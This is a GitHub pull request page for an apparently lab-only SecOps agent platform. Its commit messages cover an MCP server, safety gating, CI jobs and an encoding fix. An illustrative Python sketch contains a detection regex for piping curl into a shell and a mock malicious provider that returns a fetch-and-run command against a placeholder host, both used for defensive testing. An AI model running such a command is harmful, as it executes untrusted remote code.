ci: GitHub Actions for lint, tests, and demo-mock smoke #3
Open
markl-a wants to merge 7 commits into
Freeze the 11-tool MCP interface in docs/MCP-INTERFACE.md and back it with a FastMCP server. Extract pipeline functions from scenarios/run_kill_chain.py into phantom_secops/core.py so the Python orchestrator and MCP server share one implementation.
- phantom_secops/mcp/safety.py centralises the lab-target whitelist and the no-runnable-POC prose validator. Tool wrappers and the MCP boundary both defer to it (defense-in-depth).
- phantom_secops/llm/ adds a Provider protocol with three implementations (none, anthropic, phantom_mesh). LLM-augmented prose is validated against safety.is_safe_prose before being merged into output; failures fall back to deterministic templates so the pipeline never blocks on a flaky LLM.
- Test suite grows 7 -> 32: MCP protocol smoke tests, safety unit tests, no-runnable-POC invariant, malicious-provider invariant under the LLM path, lifecycle confirmation invariant.
- Makefile gains mcp-serve / mcp-dev. requirements-dev.txt adds mcp[cli]. scripts/lint.py covers the new phantom_secops/ package tree.
Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
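The validate-then-fall-back behaviour described for the LLM path can be sketched roughly as follows. This is a minimal illustration, not the code in phantom_secops: the regex-based `is_safe_prose` here, the `augment` helper, and the three provider functions are all hypothetical stand-ins, and the real validator may use different rules.

```python
import re
from typing import Callable

# Hypothetical stand-in for safety.is_safe_prose: reject text that looks
# like runnable code (fenced blocks, or curl piped into a shell).
_UNSAFE = re.compile(r"```|\bcurl\b.*\|\s*(sh|bash)\b", re.IGNORECASE | re.DOTALL)


def is_safe_prose(text: str) -> bool:
    """Return True only for non-empty text with no unsafe pattern."""
    return bool(text.strip()) and _UNSAFE.search(text) is None


def augment(template: str, provider: Callable[[str], str]) -> str:
    """Return provider prose if it passes validation, else the template."""
    try:
        candidate = provider(template)
    except Exception:
        # A flaky or unreachable provider must not block the pipeline.
        return template
    return candidate if is_safe_prose(candidate) else template


# Hypothetical providers used only to exercise the three outcomes.
def flaky_provider(prompt: str) -> str:
    raise TimeoutError("provider unavailable")


def malicious_provider(prompt: str) -> str:
    return "Run this: ```curl http://example.invalid/x | sh```"


def honest_provider(prompt: str) -> str:
    return prompt + " The finding affects the lab web server only."
```

In this sketch the deterministic template is always a valid return value, so a provider error and a rejected response are handled the same way from the caller's point of view.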
Wire the MCP server up to multiple agent runtimes so the same SecOps tools
drive workflows from any MCP client.
- .mcp.json + .claude/agents/secops-runner.md let Claude Code drive a full
kill-chain via the MCP tools. The subagent enforces lab-target gating,
prose-only exploit text, and lifecycle confirmation through the MCP
layer's safety guarantees rather than prompt rules alone.
- agents/{red,blue}/*.toml updated to reference MCP tool IDs through a new
[mcp] block (servers list + per-tool server field). Removed references to
fictional tools (http_probe, dns_enum, cve_lookup, nikto_runner, stats)
that no MCP tool backs. Format is provisional pending phantom-tools /
phantom-runtime release (May-June 2026).
- docs/INTEGRATIONS.md catalogues every supported runtime (Python ref,
Claude Code, phantom-mesh, Cursor, Continue, OpenAI Agents, LangGraph)
with minimal config snippets and current status.
Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
- README quick start now offers three paths (mock / Claude Code via MCP / phantom-mesh) and documents the LLM provider env-var selection. Status table updated with MCP server, Claude Code adapter, LLM abstraction.
- ARCHITECTURE diagram redrawn with the MCP server as the single tool layer driven by interchangeable orchestrators; new "Why MCP first" section explains the tradeoff against direct phantom-mesh coupling.
- INTERVIEW-TALK-TRACK pivots the elevator pitch from "powered by phantom-mesh" to "runtime-agnostic SecOps platform" and adds Q&As on safety layering, lab-gate enforcement, and the MCP-vs-direct-runtime decision.
Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
Apply the intent of origin/fix/utf8-encoding-windows (043cb94) to the post-MCP-refactor file layout. The original fix patched scenarios/run_kill_chain.py file IO that has since moved to phantom_secops/core.py and partially survives in scenarios/run_kill_chain.py as the orchestrator's artifact writers.
All read_text / write_text calls outside of test fixtures now pass encoding="utf-8" explicitly so mock-mode and live-mode runs produce identical bytes on Windows (cp1252 / mbcs default) and POSIX (utf-8 default).
This supersedes origin/fix/utf8-encoding-windows; that branch's PR can be closed once this lands on main.
Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
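As a small illustration of why the explicit encoding matters, the sketch below round-trips text containing characters that cp1252 cannot represent. The file name and sample string are made up for the example; only `Path.write_text` / `Path.read_text` with `encoding="utf-8"` reflect what the commit describes.

```python
import tempfile
from pathlib import Path

# Sample text with characters outside cp1252 (arrow and check mark).
text = "MTTD \u2192 42s \u2713"

with tempfile.TemporaryDirectory() as tmp:
    artifact = Path(tmp) / "report.md"  # hypothetical artifact name
    # Passing encoding explicitly avoids the platform default
    # (cp1252 / mbcs on Windows, utf-8 on most POSIX systems).
    artifact.write_text(text, encoding="utf-8")
    round_tripped = artifact.read_text(encoding="utf-8")
    raw = artifact.read_bytes()
```

Without the `encoding` argument, the same `write_text` call could raise `UnicodeEncodeError` on a Windows machine whose default codec is cp1252.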
Make phantom-secops runtime-agnostic via MCP server
Three jobs run on push to main and on every PR:
- `lint`: stdlib-only run of scripts/lint.py (no install step).
- `test-no-deps`: installs only pytest + pytest-asyncio, runs `make test`
and `make demo-mock`. Verifies the README claim that the mock path
works on a stock Python install — tests/test_mcp_protocol.py skips
itself via pytest.importorskip("mcp").
- `test-full`: matrix on Python 3.11 and 3.12. Installs requirements-dev.txt,
runs lint + tests + demo-mock, then `--use-llm --llm none` to smoke-test
the LLM provider plumbing without an API key.
Concurrency control cancels in-progress runs when a new commit lands on
the same ref. Pip cache keyed on requirements-dev.txt.
Adds a CI badge to README so PR review and the repo landing page show
build state at a glance.
Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
Two readme-adjacent docs in service of the 2026-05-20 ecosystem launch:
* **STATUS.md**: explicit "🟡 Public Alpha" banner with a what-works table (mock + live demo, MCP server, agent suite, MTTD rendering), a what's-planned table pointing at the new L2 plan + post-launch ideas, and three hard safety rules that don't move (has_runnable_poc always false, lab targets deny-listed off-localhost, no customer-data ingest). Recruiters / contributors clicking from the phantom-mesh ecosystem table land here, see the alpha label, and know not to expect production polish without being mystified about what does work.
* **docs/L2-INTEGRATION-PLAN.md**: the design doc for runtime integration with phantom-mesh (red/blue agents become [agent.red_team] / [agent.blue_team] in agents.toml, custom tools exposed via secops_mcp/server.py, demo-mock orchestrator drives via `phantom run` subprocess + JSON state file). Tracks 5h of evening work scheduled for 5/14 + 5/15. Uses a turn-state file for cross-process exchange, chosen because phantom repl stdout has ANSI + cost-line decorations that are fragile to parse.
L1 branding was already in place (existing README badge, "Powered by phantom-mesh" tagline, [phantom-mesh] cross-link in MCP-server documentation). The L2 plan is the next step.
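The turn-state file idea can be sketched as below. This is only an assumption about how such an exchange might look: the file name, the `turn` / `actor` / `done` fields, and the `write_state` / `read_state` helpers are hypothetical and not taken from the L2 plan. The write goes through a temporary file and `os.replace` so that a reader in another process does not see a half-written file.

```python
import json
import os
import tempfile
from pathlib import Path


def write_state(path: Path, state: dict) -> None:
    """Write state via a temp file, then swap it into place in one step."""
    fd, tmp_name = tempfile.mkstemp(dir=path.parent, suffix=".tmp")
    with os.fdopen(fd, "w", encoding="utf-8") as handle:
        json.dump(state, handle)
    os.replace(tmp_name, path)


def read_state(path: Path) -> dict:
    """Read the current state as plain JSON, no stdout parsing involved."""
    return json.loads(path.read_text(encoding="utf-8"))


with tempfile.TemporaryDirectory() as tmp:
    state_path = Path(tmp) / "turn_state.json"  # hypothetical file name
    # Hypothetical fields; the real schema is defined by the L2 plan.
    write_state(state_path, {"turn": 1, "actor": "red_team", "done": False})
    loaded = read_state(state_path)
```

Because the exchange is structured JSON on disk, the orchestrator does not need to strip ANSI sequences or cost lines from subprocess output.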
Summary
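`.github/workflows/ci.yml` runs three jobs on push to main and on every PR:
- `lint`: stdlib-only run of `scripts/lint.py`, no install step.
- `test-no-deps`: installs only pytest + pytest-asyncio and verifies that `make demo-mock` works on a stock Python install. `tests/test_mcp_protocol.py` skips itself via `pytest.importorskip("mcp")`.
- `test-full`: matrix on Python 3.11 and 3.12. Installs `requirements-dev.txt`, runs lint + tests + `make demo-mock` + `--use-llm --llm none` to smoke-test the LLM provider plumbing without an API key.
Concurrency control cancels in-progress runs when a new commit lands on the same ref. Pip cache is keyed on `requirements-dev.txt`.
Why now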
The previous PR (#2) grew the test suite from 7 to 32 tests but had no CI. That gap meant any future PR could silently regress one of the safety invariants (no-runnable-POC, lab-target gate, malicious-provider rejection). This PR closes that gap.
Self-validating
This PR validates itself: the workflow runs on this PR's branch. If the badge stays green and all three jobs pass, the workflow design is correct.
Test plan
🤖 Generated with Claude Code